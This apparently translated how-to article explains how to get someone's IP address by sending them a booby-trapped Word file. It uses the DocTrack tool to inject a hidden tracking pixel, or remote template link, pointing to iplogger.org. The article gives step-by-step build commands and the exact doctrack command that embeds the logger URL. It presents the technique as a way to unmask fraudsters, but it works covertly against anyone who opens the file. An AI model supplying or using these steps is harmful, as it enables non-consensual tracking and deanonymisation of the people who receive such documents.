You need to find information about a fraudster, or want to determine someone’s identity, the simple way is to find that person’s IP and then report it to the police. But sending a link to get an IP will be easily suspicious and they will rarely click on a strange link. There is a solution where you just need to send the Word file to that person, you will immediately know what that person’s IP is. Instructions to Get other people’s IPs with Word files
By inserting a “tracking pixel” into the metadata field of a Word or Excel file, when someone opens the word file, the code will immediately be executed, leading to the Web page taking another person’s IP. However, you cannot do this manually, you need to use Tool doctrack to insert the code.
DocTrack features include:
- Insert tracking pixel (Tracking Code) into Office Open XML documents (Word and Excel)
- Insert link (also known as Remote Template Injection)
- Check the metadata of Word or Excel to see if the tracking code is inserted
The code to execute the link to get the IP will be located at the path “word/_rels/document.xml.rels”, you use Winrar to open the word file and you will see it.
Now we will create a Word File to insert the code to get the IP.
Step 1. Create a link to get IP
If you don’t have programming skills, you can use some of the free services provided link to get IP. Some Websites like:
In this article, I will demo by inserting hidden link of iplogger into word file. Go to iplogger.org, select Invisible image -> Get IPlogger Code -> click agree to the terms.
You copy the link in the line Your IPLogger link for collecting statistics Again, as shown in the picture: https://iplogger.org/1kjue7
As for Tab IP Logger’s is for you to see the results, what is the IP of the person you are looking for.
Note: You should create an iplogger account to easily check the IP later. And if you don’t register for an account, during the process do not close the IPLogger window go, otherwise the link will be changed and the results will not be visible.
Step 2. Create a Word file to get IP with DocTrack
To use DocTrack you need to install Dot Net Core SDK. Download and install these 2 tools from Microsoft
Now proceed to download and install DocTrack.
You extract the DocTrack folder to the C:\ drive, open CMD and type the command:
cd C:\DocTrack
dotnet publish -r win-x64 -c Release /p:PublishSingleFile=true
Wait for the screen to stand still and the message “Determining projects to restore…” then press Enter Wait until it’s finished.
Now you create a Word file, edit whatever content you want or leave the content blank, then save it as a name anonyviet.docx to the path:
C:\doctrack\doctrack\bin\Release\netcoreapp3.1\win-x64
Then turn off File Word.
So you will have the path of the newly created word file:
C:\doctrack\doctrack\bin\Release\netcoreapp3.1\win-x64\anonyviet.docx
Back in the CMD window, type the command:
cd C:\doctrack\doctrack\bin\Release\netcoreapp3.1\win-x64\
doctrack -i anonyviet.docx -o anonyviet.docx --metadata metadata.json --url đường-link-lấy-ip-ở-bước-1
For example in Step 1 I have a link to get the IP https://iplogger.org/1kjue7then you would type the following:
doctrack -i anonyviet.docx -o anonyviet.docx --metadata metadata.json --url https://iplogger.org/1kjue7
That’s it, now you send the file anonyviet.docx to anyone you want to get the IPas long as they open the Word file, the IP will be immediately sent to https://iplogger.org as in Step 1. you access the tab IP Logger’s to see the person’s IP, if the IP is not displayed, press F5 to reload the page.
